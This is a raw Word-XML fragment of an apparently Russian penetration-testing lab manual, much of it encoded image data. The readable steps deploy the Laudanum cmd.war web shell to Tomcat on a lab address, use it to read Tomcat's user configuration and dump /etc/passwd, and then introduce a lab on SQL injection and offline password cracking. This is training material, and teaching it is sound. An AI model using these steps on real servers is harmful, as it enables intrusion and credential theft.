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&#10;8qb/qn9j+0r0n6GxsIKttemrLjUW1rC15EvwQcLlTf9VPDNBD6774MwEEdF/AcMEERERqcKDNSIi&#10;IlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKF&#10;YYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKI&#10;iIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhU&#10;YZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZgg&#10;IiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIi&#10;VRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgm&#10;iIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiI&#10;SBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWG&#10;CSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIi&#10;IlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKF&#10;YYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKI&#10;iIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhU&#10;YZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZgg&#10;IiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIi&#10;VRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgm&#10;iIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiI&#10;SBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWG&#10;CSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIi&#10;IlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKF&#10;YYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKI&#10;iIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhU&#10;YZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZgg&#10;IiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIi&#10;VRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgm&#10;iIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiI&#10;SBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWG&#10;CSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIi&#10;IlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKF&#10;YYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKIiIhUYZggIiIiVRgmiIiISBWGCSIiIlKFYYKI&#10;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&#10;MS5wbmdQSwUGAAAAAAYABgB8AQAAM6gAAAAA&#10;">
                <v:shape id="Shape 3" o:spid="_x0000_s1037" type="#_x0000_t75" style="position:absolute;left:1524;top:1524;width:36035;height:48387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b51fDAAAA2gAAAA8AAABkcnMvZG93bnJldi54bWxEj9FqwkAURN+F/sNyC30zG4uIRlcpLS1S&#10;FDT6AdfdaxLM3g3ZrUn/3hUEH4eZOcMsVr2txZVaXzlWMEpSEMTamYoLBcfD93AKwgdkg7VjUvBP&#10;HlbLl8ECM+M63tM1D4WIEPYZKihDaDIpvS7Jok9cQxy9s2sthijbQpoWuwi3tXxP04m0WHFcKLGh&#10;z5L0Jf+zCibd8fcn344Pu9Gs36311+Y0Y63U22v/MQcRqA/P8KO9NgrGcL8Sb4B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dvnV8MAAADaAAAADwAAAAAAAAAAAAAAAACf&#10;AgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAI8DAAAAAA==&#10;">
                  <v:imagedata r:id="rId149" o:title=""/>
                </v:shape>
                <v:rect id="Прямоугольник 6" o:spid="_x0000_s1038" style="position:absolute;left:16128;top:48189;width:6885;height:19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PTR8AA&#10;AADaAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wt+h/AWvG2T9VCWapQqCHoq/j0/mrdt&#10;2ealNLHWb2+EBY/DzPyGWaxG24qBet841vCdKBDEpTMNVxrOp+3XDwgfkA22jknDgzyslpOPBWbG&#10;3flAwzFUIkLYZ6ihDqHLpPRlTRZ94jri6P263mKIsq+k6fEe4baVM6VSabHhuFBjR5uayr/jzWqY&#10;FReq1vnepk6WuXLXQRWnQuvp55jPQQQawzv8394ZDSm8rsQbIJ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nPTR8AAAADaAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="2.25pt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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49C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4. Распаковать архив, с помощью команды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tar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>zxvf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> laudanum-1.0.tgz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066F47D" wp14:editId="58BE0865">
            <wp:extent cx="5827307" cy="4902200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="28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150"/>
                    <a:srcRect b="20793"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="490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49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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5. Подключиться к внутренней сети и загрузить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cmd.war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в TOMCAT. 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sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_28"/>
          <w:id w:val="-1196694310"/>
        </w:sdtPr>
        <w:sdtContent/>
      </w:sdt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C8F8E54" wp14:editId="2A541AAA">
            <wp:extent cx="5106353" cy="2806857"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="383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353" cy="2806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6. Получить доступ к командной строке, расположенной по адресу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http://192.168.56.110:8180/cmd/cmd.jsp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F2CEDCF" wp14:editId="39ABFA70">
            <wp:extent cx="5940115" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="366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E3CEB3B" wp14:editId="2218EA49">
            <wp:extent cx="5819775" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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7. Перейти в директорию хранения файлов TOMCAT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A638A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3EF0662A" wp14:editId="278C39C4">
            <wp:extent cx="5808134" cy="3789532"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="32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 rotWithShape="1">
                    <a:blip r:embed="rId154"/>
                    <a:srcRect r="10541"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5804728" cy="378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8AB" w:rsidRDefault="00A638A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8. Просмотреть конфигурационный файл со списком пользователей (просмотреть в исходном коде страницы).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sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_30"/>
          <w:id w:val="1648247529"/>
        </w:sdtPr>
        <w:sdtContent/>
      </w:sdt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2F38E1D3" wp14:editId="343C236F">
            <wp:extent cx="5827706" cy="2982602"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:docPr id="379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044" cy="2983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9. Выгрузить файлы со списком пользователей ОС (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etc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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).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9273632" wp14:editId="005703A5">
            <wp:extent cx="5940115" cy="2882900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24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b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc107507620"/>
      <w:bookmarkStart w:id="40" w:name="_Toc107513739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 xml:space="preserve">Лабораторная работа № 5.4. SQL-инъекция и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>оффлайн</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-подбор паролей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40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изучить принцип эксплуатац</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ии уя</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">звимостей типа SQL-инъекция и принцип </w:t>
